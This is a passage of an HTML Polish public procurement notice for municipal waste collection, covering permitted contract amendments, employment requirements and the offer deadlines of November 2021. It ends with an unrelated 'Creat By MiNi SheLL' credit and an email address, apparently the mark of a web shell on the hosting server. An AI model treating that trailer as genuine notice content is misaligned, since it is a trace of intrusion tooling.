ilości odpadów) z zachowaniem cen jednostkowych podanych w ofercie; <br/>c)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy); <br/>d)	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego; <br/>e)	dopuszczalna jest zmiana numeru rachunku bankowego Wykonawcy, podanego w umowie, w przypadku zmiany rachunku bankowego Wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia; <br/>f)	konieczności zmiany harmonogramu odbioru odpadów komunalnych, przy zachowaniu częstotliwości odbioru odpadów; <br/>g)	konieczności zmian w strukturze zamówienia kwalifikowanego w Specyfikacji Warunków Zamówienia jako prawo opcji wynikającej z konieczności zwiększenia odbioru ilości odpadów odbieranych selektywnie przy jednoczesnym zmniejszeniu ilości odbieranych odpadów zmieszanych lub na odwrót, przy jednoczesnym zastrzeżeniu, że zmiany te (po ponownym przeliczeniu maksymalnego wynagrodzenia) nie mogą spowodować zwiększenia wynagrodzenia; <br/>h)	postanowienia zawartej umowy w zakresie udziału podwykonawców (jeżeli Wykonawca 14 przewidywał powierzenie części zamówienia do wykonania podwykonawcom) w realizacji zamówienia mogą ulec zmianie w przypadku zmiany podwykonawców i powierzenia części zamówienia nowym podwykonawcom. 2. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-02 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com